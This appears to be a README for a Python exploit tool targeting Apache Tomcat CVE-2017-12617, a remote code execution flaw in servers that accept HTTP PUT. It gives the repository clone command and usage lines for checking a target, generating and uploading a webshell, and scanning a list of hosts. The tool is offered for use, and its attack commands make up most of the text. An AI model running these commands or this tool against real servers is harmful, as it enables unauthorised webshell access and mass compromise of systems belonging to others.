CVE-2017-12617

CVE-2017-12617 critical Remote Code Execution (RCE) vulnerability discovered in Apache Tomcat

affect systems with HTTP PUTs enabled (via setting the “read-only” initialization parameter of the Default servlet to “false”) are affected. Tomcat versions before 9.0.1 (Beta), 8.5.23, 8.0.47 and 7.0.82 contain a potentially dangerous remote code execution (RCE) vulnerability on all operating systems if the default servlet is configured with the parameter readonly set to false or the WebDAV servlet is enabled with the parameter readonly set to false

Download

git clone https://github.com/cyberheartmi9/CVE-2017-12617.git

Usage

./cve-2017-12617.py [options]

options:

-u ,–url [::] check target url if it’s vulnerable 
-p,–pwn [::] generate webshell and upload it 
-l,–list [::] hosts list

[+]usage:

./cve-2017-12617.py -u http://127.0.0.1 
./cve-2017-12617.py –url http://127.0.0.1 
./cve-2017-12617.py -u http://127.0.0.1 -p pwn 
./cve-2017-12617.py –url http://127.0.0.1 -pwn pwn 
./cve-2017-12617.py -l hotsts.txt 
./cve-2017-12617.py –list hosts.txt

Banner

Check target if it’s vulnerable

Confirm file was created

Create Webshell and get shell 

Scan hosts in txt file

Source: https://github.com/cyberheartmi9/CVE-2017-12617